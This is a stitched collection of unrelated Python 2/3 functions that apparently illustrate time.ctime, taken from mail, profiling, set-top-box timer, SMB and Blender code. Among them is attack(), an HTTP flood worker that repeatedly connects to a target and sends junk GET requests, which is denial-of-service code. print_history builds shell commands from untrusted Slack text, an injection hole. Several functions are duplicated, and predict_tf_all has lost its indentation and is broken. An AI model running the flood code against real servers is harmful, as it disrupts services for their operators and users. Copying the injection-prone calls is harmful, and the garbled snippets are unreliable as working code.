def __init__(self, localaddr, remoteaddr):
    """Create an asyncore-based SMTP proxy server listening on `localaddr`.

    `remoteaddr` is stored for later relaying.  On any setup failure the
    dispatcher is closed (removing it from asyncore.socket_map) and the
    exception is re-raised.  Python 2 code (print >> stream).
    """
    self._localaddr = localaddr
    self._remoteaddr = remoteaddr
    asyncore.dispatcher.__init__(self)
    try:
        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        # try to re-use a server port if possible
        self.set_reuse_addr()
        self.bind(localaddr)
        self.listen(5)
    except:
        # cleanup asyncore.socket_map before raising
        self.close()
        raise
    else:
        # Startup banner goes to the module's debug stream, not stdout.
        print >> DEBUGSTREAM, \
              '%s started at %s\n\tLocal addr: %s\n\tRemote addr:%s' % (
                  self.__class__.__name__, time.ctime(time.time()),
                  localaddr, remoteaddr)
# Python time.ctime() usage examples (collected snippets)
def flatten(self, msg, unixfrom=False):
    """Print the message object tree rooted at msg to the output file
    specified when the Generator instance was created.
    unixfrom is a flag that forces the printing of a Unix From_ delimiter
    before the first object in the message tree. If the original message
    has no From_ delimiter, a `standard' one is crafted. By default, this
    is False to inhibit the printing of any From_ delimiter.
    Note that for subobjects, no From_ line is printed.
    """
    if unixfrom:
        ufrom = msg.get_unixfrom()
        if not ufrom:
            # Craft the standard envelope line with the current time.
            ufrom = 'From nobody ' + time.ctime(time.time())
        print >> self._fp, ufrom
    self._write(msg)
def load_stats(self, arg):
    """Load profiling statistics from `arg`.

    `arg` may be falsy (reset to empty stats), a filename of a
    marshal-dumped stats file, or a Profile-like object exposing
    create_stats().  Raises TypeError if no stats could be obtained.
    Python 2 code (basestring, raise-with-comma).
    """
    if not arg: self.stats = {}
    elif isinstance(arg, basestring):
        f = open(arg, 'rb')
        self.stats = marshal.load(f)
        f.close()
        try:
            # Prefix the recorded filename with its modification time.
            file_stats = os.stat(arg)
            arg = time.ctime(file_stats.st_mtime) + " " + arg
        except:  # in case this is not unix
            pass
        self.files = [ arg ]
    elif hasattr(arg, 'create_stats'):
        arg.create_stats()
        self.stats = arg.stats
        # Detach the stats from the profiler object once copied.
        arg.stats = {}
    if not self.stats:
        raise TypeError, "Cannot create or construct a %r object from '%r''" % (
            self.__class__, arg)
    return
def __str__(self):
    """Render a multi-line, human-readable summary of this object.

    Shows the bound server, the last refresh time (if any), an init-status
    note, then every attribute in self._info sorted by name.  Dirty
    attributes are flagged '(+)' (added) or '(*)' (modified); values longer
    than 50 characters are truncated with an ellipsis.
    """
    header = "{0:s} object, bound to {1:s}.".format(
        self.__class__.__name__, self._cb.session.server)
    parts = [header]
    if self._last_refresh_time:
        parts.append(" Last refreshed at {0:s}".format(time.ctime(self._last_refresh_time)))
    if not self._full_init:
        parts.append(" Partially initialized. Use .refresh() to load all attributes")
    parts.extend(["-" * 79, ""])
    for key in sorted(self._info):
        if key not in self._dirty_attributes:
            marker = " "
        elif self._dirty_attributes[key] is None:
            marker = "(+)"
        else:
            marker = "(*)"
        text = str(self._info[key])
        if len(text) > 50:
            text = text[:47] + u"..."
        parts.append(u"{0:s} {1:>20s}: {2:s}".format(marker, key, text))
    return "\n".join(parts)
def run(self):
    """Poll the TF session's global step until the configured end step.

    Records wall-clock time and step count when the step counter first
    reaches start_at_global_step, and again when it reaches
    end_at_global_step (which also terminates the loop).
    """
    while self.finish_time == 0:
        time.sleep(.25)
        step, = self.sess.run([self.global_step_op])
        if self.start_time == 0 and step >= self.start_at_global_step:
            # Use tf.logging.info instead of log_fn, since print (which is
            # log_fn) is not thread safe and may interleave the outputs from
            # two parallel calls to print, which can break tests.
            tf.logging.info('Starting real work at step %s at time %s' %
                            (step, time.ctime()))
            self.start_time = time.time()
            self.start_step = step
        if self.finish_time == 0 and step >= self.end_at_global_step:
            tf.logging.info('Finishing real work at step %s at time %s' %
                            (step, time.ctime()))
            self.finish_time = time.time()
            self.finish_step = step
def build_full_record_to(pathToFullRecordFile):
    """structure of full record:
    {commitID: {'build-time': time, files: {filename: {record}, filename: {record}}}}
    """
    # NOTE: caching the record to/from pathToFullRecordFile was disabled
    # because serializing the full record exhausted memory (the process was
    # killed by the OS); the record is always rebuilt from scratch instead.
    # The parameter is kept for interface compatibility.
    return build_full_record()
def build_full_record_to(path_to_full_record_file):
    """structure of full record:
    {commitID: {'build-time': time, files: {filename: {record}, filename: {record}}}}
    """
    full_record = build_full_record()
    if DO_PRINT_RECORDS:
        # Dump the whole record as its repr; may raise MemoryError on
        # very large histories (re-raised after being printed).
        f = open(path_to_full_record_file, 'w')
        try:
            f.write(repr(full_record) + "\n")
        except MemoryError as me:
            print me
            raise
        finally:
            # Timestamp the attempt and close the file even on failure.
            print time.ctime()
            f.close()
        print "built full record, wrote to " + path_to_full_record_file
    return full_record
def attack():
    """Open one TCP connection to the global `host`:`port` and send a junk
    GET request (simple HTTP flood worker).  Increments the global request
    counter `n`.  Python 2 code (string.letters, print statement)."""
    ip = socket.gethostbyname( host )
    global n
    # Random 5-character path so each request URL looks unique.
    msg=str(string.letters+string.digits+string.punctuation)
    data="".join(random.sample(msg,5))
    dos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        n+=1
        dos.connect((ip, port))
        dos.send( "GET /%s HTTP/1.1\r\n" % data )
        # ctime().split(" ")[3] extracts the HH:MM:SS field.
        print "\n "+time.ctime().split(" ")[3]+" "+"["+str(n)+"] #-#-# Hold Your Tears #-#-#"
    except socket.error:
        print "\n [ No connection! Server maybe down ] "
    dos.close()
def flatten(self, msg, unixfrom=False):
    """Print the message object tree rooted at msg to the output file
    specified when the Generator instance was created.
    unixfrom is a flag that forces the printing of a Unix From_ delimiter
    before the first object in the message tree. If the original message
    has no From_ delimiter, a `standard' one is crafted. By default, this
    is False to inhibit the printing of any From_ delimiter.
    Note that for subobjects, no From_ line is printed.
    """
    if unixfrom:
        ufrom = msg.get_unixfrom()
        if not ufrom:
            # Craft the standard envelope line with the current time.
            ufrom = 'From nobody ' + time.ctime(time.time())
        print >> self._fp, ufrom
    self._write(msg)
def run(interval, command):
    """Run `command` via os.system once per `interval` seconds, aligned to
    wall-clock multiples of the interval (e.g. interval=60 fires on the
    minute).  Loops forever; exceptions are printed and the loop continues.
    Python 2 code (except-with-comma)."""
    print_ts("-"*100)
    print_ts("Command %s"%command)
    print_ts("Starting every %s seconds."%interval)
    print_ts("-"*100)
    while True:
        try:
            # sleep for the remaining seconds of interval
            time_remaining = interval-time.time()%interval
            print_ts("Sleeping until %s (%s seconds)..."%((time.ctime(time.time()+time_remaining)), time_remaining))
            time.sleep(time_remaining)
            print_ts("Starting command.")
            # execute the command
            status = os.system(command)
            print_ts("-"*100)
            print_ts("Command status = %s."%status)
        except Exception, e:
            print e
def run(self, edit):
    """Sublime Text plugin run method.

    Locates the configured modified-time header field in the view and
    rewrites that whole line with the field label plus the current ctime.
    """
    # Note, if one changes the header, this might need to change too.
    pattern = util.get_vhdl_setting(self, 'vhdl-modified-time-string')
    match_region = self.view.find(pattern, 0)
    if match_region.empty():
        print('vhdl-mode: No last modified time field found.')
        return
    # Expand the match to the full line so the old timestamp is replaced.
    full_line = self.view.line(match_region)
    stamp = pattern + '{}'.format(time.ctime(time.time()))
    self.view.replace(edit, full_line, stamp)
    print('vhdl-mode: Updated last modified time.')
#----------------------------------------------------------------
def convert_all_files_in_path(self, path):
    """Convert Qt designer files in `path` to Python modules.

    *.ui files go through self.PYUIC into <name>.py; *.qrc files go through
    self.PYRCC into <name>_rc.py.  A file is regenerated only when
    modified(source, output) says the output is stale.  Prints a summary.
    """
    if not os.path.exists(path):
        print("'%s': Path doesn't exists. Skipping" % path)
        return
    count = 0
    for entry in os.listdir(path):
        src = os.path.join(path, entry)
        stem, _ext = os.path.splitext(src)
        tool = pyfile = None
        if fnmatch.fnmatch(entry, '*.ui'):
            tool, pyfile = self.PYUIC, '%s.py' % stem
        elif fnmatch.fnmatch(entry, '*.qrc'):
            tool, pyfile = self.PYRCC, '%s_rc.py' % stem
        if tool and modified(src, pyfile):
            os.system('%s -o "%s" "%s"' % (tool, pyfile, src))
            count += 1
    print("'%s': %s converted %s files" % (path, time.ctime(time.time()), count))
def file_mod_time(filepath):
    """Return the last-modification time of `filepath` as a ctime string
    (e.g. 'Mon Jan  1 00:00:00 2024').

    On failure (e.g. the file does not exist) the underlying exception is
    re-raised; when DEBUG_FLAG is set a framework error note is written to
    stderr first.
    """
    try:
        import time
        return time.ctime(os.path.getmtime(filepath))
    except Exception:
        if DEBUG_FLAG:
            sys.stderr.write("Naked Framework Error: unable to return file modification data with the file_mod_time() function (Naked.toolshed.system).")
        # bare raise preserves the original traceback; `raise e` re-raised
        # from here and lost the real failure location
        raise
#------------------------------------------------------------------------------
#
# FILE LISTINGS
#
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# [ list_all_files function ] (list)
# returns a list of all files in developer specified directory
# Tests: test_SYSTEM.py :: test_sys_list_all_files, test_sys_list_all_files_emptydir
#------------------------------------------------------------------------------
def file_mod_time(filepath):
    """Return the file's last-modified timestamp formatted by time.ctime."""
    try:
        import time
        mtime = os.path.getmtime(filepath)
        return time.ctime(mtime)
    except Exception as e:
        # Best-effort diagnostic before re-raising the original error.
        if DEBUG_FLAG:
            sys.stderr.write("Naked Framework Error: unable to return file modification data with the file_mod_time() function (Naked.toolshed.system).")
        raise e
#------------------------------------------------------------------------------
#
# FILE LISTINGS
#
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# [ list_all_files function ] (list)
# returns a list of all files in developer specified directory
# Tests: test_SYSTEM.py :: test_sys_list_all_files, test_sys_list_all_files_emptydir
#------------------------------------------------------------------------------
def print_history(self, response, channel_name):
    """Clear the terminal, banner the channel name via figlet, then print
    the channel's Slack message history oldest-first: author name in red,
    ctime-formatted timestamp in yellow, followed by the message text."""
    os.system("clear; figlet '" + channel_name + "' | lolcat")
    # API returns newest-first; reverse for chronological display.
    response["messages"].reverse()
    text = ""
    for i in response["messages"]:
        if "user" in i:
            text += "\033[31m" + self.find_user_name(i["user"]) + "\033[0m" + "\t\t"
        elif "username" in i:
            text += "\033[31m" + (i["username"].encode('ascii', 'ignore').decode('ascii')) + "\033[0m" + "\t"
        text += "\033[93m" + time.ctime(float(i["ts"])) + "\033[0m" + "\n"
        # replace username_id with username
        if "<@" in i["text"]:
            i["text"] = "<" + i["text"].split("|")[1]
        text += (i["text"].encode('ascii', 'ignore').decode('ascii')) + "\n\n"
        # NOTE(review): echo and the `text` reset are placed inside the loop
        # (one echo per message), inferred from the reset -- the original
        # indentation was lost; confirm against upstream.
        os.system("echo ' " + text + "'")
        text = ""
def __init__(self, localaddr, remoteaddr):
    """Create an asyncore-based SMTP proxy server listening on `localaddr`.

    `remoteaddr` is stored for later relaying.  On any setup failure the
    dispatcher is closed (removing it from asyncore.socket_map) and the
    exception is re-raised.  Python 2 code (print >> stream).
    """
    self._localaddr = localaddr
    self._remoteaddr = remoteaddr
    asyncore.dispatcher.__init__(self)
    try:
        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        # try to re-use a server port if possible
        self.set_reuse_addr()
        self.bind(localaddr)
        self.listen(5)
    except:
        # cleanup asyncore.socket_map before raising
        self.close()
        raise
    else:
        # Startup banner goes to the module's debug stream, not stdout.
        print >> DEBUGSTREAM, \
              '%s started at %s\n\tLocal addr: %s\n\tRemote addr:%s' % (
                  self.__class__.__name__, time.ctime(time.time()),
                  localaddr, remoteaddr)
def log(self,proto,data):
    """Append a timestamped hex/ASCII dump of proxied traffic to the log
    file named by self.logging (no-op when logging is disabled).

    The header line records both peers and a direction marker: '<' when
    `proto` is this connection, '>' otherwise.  Python 2 code
    (string.join, byte-string iteration).
    """
    if not self.logging: return
    peer = self.transport.getPeer()
    their_peer = self.otherConn.transport.getPeer()
    f=open(self.logging,"a")
    f.write("%s\t%s:%d %s %s:%d\n"%(time.ctime(),
                                    peer.host,peer.port,
                                    ((proto==self and '<') or '>'),
                                    their_peer.host,their_peer.port))
    while data:
        # Dump 16 bytes per line: hex column (padded to full width),
        # then the printable-ASCII rendering with '.' for non-printables.
        p,data=data[:16],data[16:]
        f.write(string.join(map(lambda x:'%02X'%ord(x),p),' ')+' ')
        f.write((16-len(p))*3*' ')
        for c in p:
            # repr(c) longer than 3 chars means c needed escaping.
            if len(repr(c))>3: f.write('.')
            else: f.write(c)
        f.write('\n')
    f.write('\n')
    f.close()
def flatten(self, msg, unixfrom=False):
    """Print the message object tree rooted at msg to the output file
    specified when the Generator instance was created.
    unixfrom is a flag that forces the printing of a Unix From_ delimiter
    before the first object in the message tree. If the original message
    has no From_ delimiter, a `standard' one is crafted. By default, this
    is False to inhibit the printing of any From_ delimiter.
    Note that for subobjects, no From_ line is printed.
    """
    if unixfrom:
        ufrom = msg.get_unixfrom()
        if not ufrom:
            # Craft the standard envelope line with the current time.
            ufrom = 'From nobody ' + time.ctime(time.time())
        print >> self._fp, ufrom
    self._write(msg)
def update_schedule(self, result = None, retval = None, extra_args = None):
    """NTP-sync callback: push the freshly-synced system time into the RTC
    and the Enigma2 time handler, then re-arm the periodic sync timer.
    Retries in 10s while no plausible time is available.  Python 2 code."""
    nowTime = time()
    nowTimereal = ctime(nowTime)
    # A unixtime <= 10000 means the clock has not been set yet.
    if nowTime > 10000:
        print '[NTP]: setting E2 unixtime:',nowTime
        print '[NTP]: setting E2 realtime:',nowTimereal
        setRTCtime(nowTime)
        # Config value "1" selects NTP as the time source (disable DVB time).
        if config.misc.SyncTimeUsing.value == "1":
            eDVBLocalTimeHandler.getInstance().setUseDVBTime(False)
        else:
            eDVBLocalTimeHandler.getInstance().setUseDVBTime(True)
        eEPGCache.getInstance().timeUpdated()
        self.timer.startLongTimer(int(config.misc.useNTPminutes.value) * 60)
    else:
        print 'NO TIME SET'
        # No valid time yet -- retry shortly.
        self.timer.startLongTimer(10)
def __repr__(self):
    """Debug representation: timer type name, begin time as ctime, and a
    'Disabled' marker when the entry is inactive."""
    type_names = {
        TIMERTYPE.NONE: "nothing",
        TIMERTYPE.WAKEUP: "wakeup",
        TIMERTYPE.WAKEUPTOSTANDBY: "wakeuptostandby",
        TIMERTYPE.AUTOSTANDBY: "autostandby",
        TIMERTYPE.AUTODEEPSTANDBY: "autodeepstandby",
        TIMERTYPE.STANDBY: "standby",
        TIMERTYPE.DEEPSTANDBY: "deepstandby",
        TIMERTYPE.REBOOT: "reboot",
        TIMERTYPE.RESTART: "restart"
    }
    kind = type_names[self.timerType]
    begin = ctime(self.begin)
    if self.disabled:
        return "PowerTimerEntry(type=%s, begin=%s Disabled)" % (kind, begin)
    return "PowerTimerEntry(type=%s, begin=%s)" % (kind, begin)
def getPriorityCheck(self,prioPT,prioPTae):
    """Scan upcoming power-timer entries that start or end within the next
    15 minutes and decide how this timer must behave.

    Returns (shiftPT, breakPT): shiftPT is set when a fake-time entry is
    found; breakPT when another entry matches the priority timer types
    (prioPT) or after-events (prioPTae).  The entry representing this very
    timer is excluded from the break check.  Each entry is a tuple
    (begin/end time, timerType, afterEvent, state).  Python 2 code.
    """
    shiftPT = breakPT = False
    nextPTlist = NavigationInstance.instance.PowerTimer.getNextPowerManagerTime(getNextTimerTyp = True)
    for entry in nextPTlist:
        #check timers within next 15 mins will started or ended
        if abs(entry[0] - time()) > 900:
            continue
        #faketime
        if entry[1] is None and entry[2] is None and entry[3] is None:
            if debug: print "shift#2 - entry is faketime", ctime(entry[0]), entry
            shiftPT = True
            continue
        #is timer in list itself?
        if entry[0] == self.begin and entry[1] == self.timerType and entry[2] is None and entry[3] == self.state \
                or entry[0] == self.end and entry[1] is None and entry[2] == self.afterEvent and entry[3] == self.state:
            if debug: print "entry is itself", ctime(entry[0]), entry
            nextPTitself = True
        else:
            nextPTitself = False
        if (entry[1] in prioPT or entry[2] in prioPTae) and not nextPTitself:
            if debug: print "break#2 <= 900", ctime(entry[0]), entry
            breakPT = True
            break
    return shiftPT, breakPT
def TimeSynctimer(self):
    """Poll every 5 seconds (max 24 tries = 2 minutes) until the system
    clock is in sync; a unixtime <= 31536000 (one year past the epoch)
    counts as 'not yet synced'.  On failure falls back to normal power-up
    handling; on success continues with the wakeup check.  Python 2 code."""
    now = time()
    self.syncCount += 1
    if now <= 31536000:
        if self.syncCount <= 24 and now <= 31536000: # max 2 mins or when time is in sync
            # Not synced yet and retries remain -- poll again in 5s.
            self.timesynctimer.start(5000, True)
        else:
            print "~"*100
            print "[NAVIGATION] time sync failure, current time is %s, sync time is %s sec." % (ctime(now),(self.syncCount * 5))
            if self.timertime > 0:
                print "[NAVIGATION] next '%s' starts at %s" % ({0:"record-timer",1:"zap-timer",2:"power-timer",3:"plugin-timer"}[self.wakeuptyp], ctime(self.timertime))
            else:
                print "[NAVIGATION] no next timers"
            print "="*100
            #workaround for normal operation if no time sync after e2 start - box is in standby
            self.gotopower()
    else:
        print "~"*100
        print "[NAVIGATION] time sync successful, current time is %s, sync time is %s sec." % (ctime(now),(self.syncCount * 5))
        self.wakeupCheck()
def log_events(log_info, type_event):
    """Append a timestamped `log_info` entry to the appropriate log file.

    type_event 'fuzzing' appends to fuzz.log, 'error' to error.log; any
    other value returns an error-message string without touching the
    filesystem.  Returns None on success, or an error string if the log
    file could not be opened.
    """
    log_msg = "[" + time.ctime() + "]" + "\n" + log_info
    if type_event == "fuzzing":
        try:
            fd = open('fuzz.log', 'a')
        except IOError as err:
            return "[!] Error opening log file: %s" % str(err)
    elif type_event == "error":
        try:
            fd = open('error.log', 'a')
        except IOError as err:
            return "[!] Error opening error file: %s" % str(err)
    else:
        return "[!] '%s' is an unrecognized log event type." % type_event
    # `with` guarantees the descriptor is closed (the original leaked it).
    with fd:
        fd.write(log_msg)
    return
def show_workspace_files(user_id, special_type='uploads'):
    """List files in the user's workspace subdirectory, creating it on
    demand.

    Returns a list of dicts sorted by file name, each carrying: name,
    file_size (bytes), file_create (ctime of creation), trace (base64 of
    the path relative to the workspace) and raw (the relative path).
    """
    import time
    import base64
    workspace = os.path.join(get_config('env', 'workspace'), str(user_id), special_type)
    if not os.path.exists(workspace):
        os.makedirs(workspace)
    entries = []
    for name in os.listdir(workspace):
        full = os.path.join(workspace, name)
        rel = os.path.join(special_type, name)
        entries.append({
            'name': name,
            'file_size': os.path.getsize(full),
            'file_create': time.ctime(os.path.getctime(full)),
            'trace': base64.b64encode(rel),
            'raw': rel,
        })
    return sorted(entries, key=lambda item: item['name'])
def predict_tf_all(path = None):
result_list = []
p = m_Pool(31)
result_list = p.map(predict_tf_once,range(1,32))
p.close()
p.join()
print 'writing...'
result_df = pd.DataFrame(index = range(1))
for day,result in result_list:
day_s = str(day)
if len(day_s)<=1:
day_s = '0'+day_s
result_df['201610'+day_s] = result
result_df = result_df.T
result_df.columns = ['predict_power_consumption']
if path == None:
date = str(pd.Timestamp(time.ctime())).replace(' ','_').replace(':','_')
path = './result/'+date+'.csv'
result_df.to_csv(path,index_label='predict_date')
l = map(lambda day:pd.DataFrame.from_csv('./result/predict_part/%d.csv'%day),range(1,32))
t = pd.concat(l)
t.to_csv('./result/predict_part/'+date+'.csv')
def signal_handler(signum, *kwargs):
    """ A handler for various interrupts: flag worker threads to stop,
    report what happened, give the threads a moment, then exit. """
    global exit_flag
    exit_flag = True
    if signum != signal.SIGINT:
        print(ERROR + "signal caught: {}".format(signum) + Style.RESET_ALL)
    else:
        print(ERROR + "user quit" + Style.RESET_ALL)
    print("[*] shutting down at {}".format(time.ctime()))
    # let time for the threads to terminate
    time.sleep(2)
    sys.exit(0)
def cache_it(self, key, f, time_expire):
    """Compute f(), cache the pickled result in Redis under `key` with a
    TTL of `time_expire` seconds, and register the key in a per-minute
    expiry 'bucket' set so stale keys can be purged in batches.
    Returns the computed (unpickled) value.

    NOTE(review): `expire_at / 60` relies on Python 2 integer division;
    under Python 3 it would yield float bucket keys -- confirm the target
    interpreter before porting.
    """
    if self.debug:
        self.r_server.incr('web2py_cache_statistics:misses')
    cache_set_key = self.cache_set_key
    # pad the expiry by 2 minutes so the bucket outlives its keys
    expire_at = int(time.time() + time_expire) + 120
    bucket_key = "%s:%s" % (cache_set_key, expire_at / 60)
    value = f()
    value_ = pickle.dumps(value, pickle.HIGHEST_PROTOCOL)
    # a zero TTL would make setex fail; clamp to 1 second
    if time_expire == 0:
        time_expire = 1
    self.r_server.setex(key, time_expire, value_)
    p = self.r_server.pipeline()
    # add bucket to the fixed set
    p.sadd(cache_set_key, bucket_key)
    # sets the key
    p.setex(key, time_expire, value_)
    # add the key to the bucket
    p.sadd(bucket_key, key)
    # expire the bucket properly
    p.expireat(bucket_key, ((expire_at / 60) + 1) * 60)
    p.execute()
    return value
def do_ls(self, wildcard, display = True):
    """List files on the current SMB share matching `wildcard` (relative
    to the current directory self.pwd; '*' when empty).

    When `display` is true, prints one ls -l style line per entry
    (directory flag, size, mtime, name).  Always refreshes
    self.completion for tab-completion.  Python 2 code.
    """
    if self.loggedIn is False:
        logging.error("Not logged in")
        return
    if self.tid is None:
        logging.error("No share selected")
        return
    if wildcard == '':
        pwd = ntpath.join(self.pwd,'*')
    else:
        pwd = ntpath.join(self.pwd, wildcard)
    self.completion = []
    # normalize to backslash-separated Windows paths for SMB
    pwd = string.replace(pwd,'/','\\')
    pwd = ntpath.normpath(pwd)
    for f in self.smb.listPath(self.share, pwd):
        if display is True:
            print "%crw-rw-rw- %10d %s %s" % (
                'd' if f.is_directory() > 0 else '-', f.get_filesize(), time.ctime(float(f.get_mtime_epoch())),
                f.get_longname())
        self.completion.append((f.get_longname(), f.is_directory()))
def draw(self, context):
    """Blender UI panel body: render-slave list with refresh/blacklist
    buttons, plus details for the currently selected slave."""
    layout = self.layout
    netsettings = context.scene.network_render
    row = layout.row()
    row.template_list("UI_UL_list", "net_render_slaves", netsettings, "slaves",
                      netsettings, "active_slave_index", rows=2)
    buttons = row.column(align=True)
    buttons.operator("render.netclientslaves", icon='FILE_REFRESH', text="")
    buttons.operator("render.netclientblacklistslave", icon='ZOOMOUT', text="")
    index = netsettings.active_slave_index
    if 0 <= index < len(netrender.slaves):
        layout.separator()
        selected = netrender.slaves[index]
        layout.label(text="Name: " + selected.name)
        layout.label(text="Address: " + selected.address[0])
        layout.label(text="Seen: " + time.ctime(selected.last_seen))
        layout.label(text="Stats: " + selected.stats)
def draw(self, context):
    """Blender UI panel body: blacklisted render-slave list with a
    whitelist button, plus details for the selected blacklisted slave."""
    layout = self.layout
    netsettings = context.scene.network_render
    row = layout.row()
    row.template_list("UI_UL_list", "net_render_slaves_blacklist", netsettings, "slaves_blacklist",
                      netsettings, "active_blacklisted_slave_index", rows=2)
    buttons = row.column(align=True)
    buttons.operator("render.netclientwhitelistslave", icon='ZOOMOUT', text="")
    index = netsettings.active_blacklisted_slave_index
    if 0 <= index < len(netrender.blacklist):
        layout.separator()
        selected = netrender.blacklist[index]
        layout.label(text="Name: " + selected.name)
        layout.label(text="Address: " + selected.address[0])
        layout.label(text="Seen: " + time.ctime(selected.last_seen))
        layout.label(text="Stats: " + selected.stats)